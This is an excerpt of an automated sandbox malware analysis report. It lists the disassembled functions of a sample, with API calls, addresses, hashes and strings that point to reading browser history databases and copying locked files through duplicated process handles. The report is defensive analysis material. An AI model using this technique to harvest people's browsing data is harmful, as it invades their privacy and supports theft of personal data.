                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProcProcessTimes
                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                        • API String ID: 1714573020-3385500049
                                                                        • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                        • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                        • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                        • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004087D6
                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                          • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                        • memset.MSVCRT ref: 00408828
                                                                        • memset.MSVCRT ref: 00408840
                                                                        • memset.MSVCRT ref: 00408858
                                                                        • memset.MSVCRT ref: 00408870
                                                                        • memset.MSVCRT ref: 00408888
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 2911713577-0
                                                                        • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                        • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                        • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                        • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                        APIs
                                                                        • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                        • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp
                                                                        • String ID: @ $SQLite format 3
                                                                        • API String ID: 1475443563-3708268960
                                                                        • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                        • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                        • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                        • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmpqsort
                                                                        • String ID: /nosort$/sort
                                                                        • API String ID: 1579243037-1578091866
                                                                        • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                        • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                        • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                        • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040E60F
                                                                        • memset.MSVCRT ref: 0040E629
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                        Strings
                                                                        • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                        • API String ID: 2887208581-2114579845
                                                                        • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                        • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                        • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                        • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                        APIs
                                                                        • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                        • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID:
                                                                        • API String ID: 3473537107-0
                                                                        • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                        • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                        • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                        • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                        APIs
                                                                        Strings
                                                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                        • API String ID: 2221118986-1725073988
                                                                        • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                        • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                        • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                        • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                        APIs
                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                        • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@DeleteObject
                                                                        • String ID: r!A
                                                                        • API String ID: 1103273653-628097481
                                                                        • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                        • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                        • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                        • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                        APIs
                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                        • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$memcmp
                                                                        • String ID: $$8
                                                                        • API String ID: 2808797137-435121686
                                                                        • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                        • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                        • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                        • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                        Strings
                                                                        • too many columns on %s, xrefs: 00430763
                                                                        • duplicate column name: %s, xrefs: 004307FE
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: duplicate column name: %s$too many columns on %s
                                                                        • API String ID: 0-1445880494
                                                                        • Opcode ID: 93b9582cf047c94b57d064edc5564507e5ded9912264045a732c21487ec891bf
                                                                        • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                        • Opcode Fuzzy Hash: 93b9582cf047c94b57d064edc5564507e5ded9912264045a732c21487ec891bf
                                                                        • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                        APIs
                                                                          • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                          • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                          • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                          • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                          • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                          • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                          • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                          • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                          • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                        • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                          • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                          • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                          • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                        • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                        • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                          • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                          • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                          • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                        • String ID:
                                                                        • API String ID: 1979745280-0
                                                                        • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                        • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                        • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                        • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                        APIs
                                                                          • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                          • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                          • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                        • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                        • free.MSVCRT ref: 00418803
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                        • String ID:
                                                                        • API String ID: 1355100292-0
                                                                        • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                        • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                        • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                        • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                        APIs
                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                        • memset.MSVCRT ref: 00403A55
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                        • String ID: history.dat$places.sqlite
                                                                        • API String ID: 2641622041-467022611
                                                                        • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                        • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                        • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                        • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                        APIs
                                                                          • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                        • GetLastError.KERNEL32 ref: 00417627
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$File$PointerRead
                                                                        • String ID:
                                                                        • API String ID: 839530781-0
                                                                        • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                        • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                        • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                        • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID: *.*$index.dat
                                                                        • API String ID: 1974802433-2863569691
                                                                        • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                        • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                        • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                        • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                        • GetLastError.KERNEL32 ref: 004175A2
                                                                        • GetLastError.KERNEL32 ref: 004175A8
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$FilePointer
                                                                        • String ID:
                                                                        • API String ID: 1156039329-0
                                                                        • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                        • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                        • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                        • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                        • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
